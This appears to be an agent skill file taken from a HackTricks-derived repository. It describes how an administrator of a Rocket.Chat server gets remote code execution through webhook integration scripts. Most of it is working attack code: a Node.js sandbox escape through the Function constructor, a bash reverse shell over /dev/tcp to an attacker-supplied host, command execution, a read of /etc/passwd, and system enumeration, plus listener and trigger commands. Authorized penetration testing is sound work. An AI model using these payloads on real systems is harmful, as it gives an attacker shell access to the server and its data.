Hacktricks-skills rocket-chat-pentest

Use this skill when pentesting a Rocket.Chat installation on which you already hold admin access. It covers abusing the integration (webhook) script feature, which runs administrator-supplied JavaScript on the server, to obtain Remote Code Execution (RCE). Trigger this skill when the user mentions Rocket.Chat or Rocket Chat, or wants to test Rocket.Chat security, especially with admin credentials during an authorized assessment.

install
Clone the upstream repo:
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-web/rocket-chat/SKILL.MD
source content

Rocket.Chat Pentesting - RCE via Webhooks

Overview

If you have admin access to a Rocket.Chat installation, you can achieve Remote Code Execution (RCE) through the webhook integration feature. Each integration can carry an ES2015 (ECMAScript 6) script that Rocket.Chat runs server-side, inside its Node.js process, whenever the webhook fires. Because the script executes on the server with the privileges of the Rocket.Chat process, an admin who controls it can run arbitrary commands. This is an abuse of an intended feature rather than a memory-safety bug, so no version-specific exploit is needed, only admin rights.

Prerequisites

  • Admin access to the Rocket.Chat instance
  • Network access to the Rocket.Chat admin panel
  • A listener/reverse shell handler on your attack machine

Exploitation Steps

1. Access the Integrations Panel

Navigate to the admin integrations page:

/admin/integrations/incoming

Click New Integration and choose either:

  • Incoming WebHook, or
  • Outgoing WebHook

Both webhook types expose the same Script field, so either one gives code execution.

2. Configure the Webhook

Set up the webhook with the following:

  • Channel: Must be an existing channel in Rocket.Chat
  • Post as username: Must be an existing user
  • Script: Insert the malicious JavaScript payload (see below)

3. JavaScript Reverse Shell Payload

Use this Node.js reverse shell payload in the Script field. Inside the script sandbox, require is not in scope, so the first line rebuilds it: console.log is a function from the host (Node.js) realm, its .constructor is the host Function constructor, and code compiled through it runs in the host global scope, where process is available. require is not a global there either, which is why the payload reaches it through process.mainModule.require.

// console.log is a host-realm function: its constructor is the host Function constructor,
// and code compiled through it runs with host scope, where process.mainModule.require exists
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
// bash reverse shell to the attacker's listener; runs as the Rocket.Chat process user
exec("bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'")

Customize:

  • Replace YOUR_IP with your attacker machine IP
  • Replace YOUR_PORT with your listener port

4. Save and Trigger

  1. Start a listener on your attack machine (for example nc -lvnp YOUR_PORT), then save the webhook configuration

  2. Copy the generated webhook URL

  3. Trigger the webhook with curl; incoming webhooks take a JSON message body, so include a minimal one rather than an empty POST:

    curl -X POST -H 'Content-Type: application/json' -d '{"text":"ping"}' "<WEBHOOK_URL>"
    
  4. Your reverse shell should connect back to your listener

Alternative Payloads

Every payload needs the same first line as the reverse shell: require is not in scope inside the script sandbox, so it has to be recovered through the Function constructor before child_process, fs or os can be loaded. Output written with console.log lands in the Rocket.Chat server log (the stdout of the Node.js process), not in the webhook's HTTP response, so these payloads are useful mainly for confirming execution when you can read the server log; for interactive access use the reverse shell above.

Basic Command Execution

const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
// Runs as the user owning the Rocket.Chat process; the callback logs the result
exec("whoami", (err, stdout) => console.log(err || stdout))

File Read

const require = console.log.constructor("return process.mainModule.require")()
const fs = require("fs")
// Readable only if the Rocket.Chat process has permission on the file
const content = fs.readFileSync("/etc/passwd")
console.log(content.toString())

System Information

const require = console.log.constructor("return process.mainModule.require")()
const os = require("os")
const { execSync } = require("child_process")
// process is not a sandbox global either; load it as a module
const proc = require("process")
console.log("Hostname:", os.hostname())
console.log("Platform:", os.platform())
console.log("Node Version:", proc.version)
console.log("User:", execSync("id").toString().trim())

Safety & Authorization

⚠️ IMPORTANT: Only use this technique on systems you have explicit authorization to test. Unauthorized access to computer systems is illegal.

Troubleshooting

  • No reverse shell received: verify the listener is running, that the Rocket.Chat server can reach YOUR_IP:YOUR_PORT (egress filtering from the server is common), and that bash exists on the host; if it does not, use the exec-based payloads first to enumerate
  • Webhook not executing: ensure the channel and username exist in Rocket.Chat and that the integration's script is enabled in its settings
  • Empty POST rejected: send a minimal JSON body (-H 'Content-Type: application/json' -d '{"text":"ping"}')
  • Script errors: check the Rocket.Chat server logs for JavaScript execution errors; console.log output from the script appears there as well
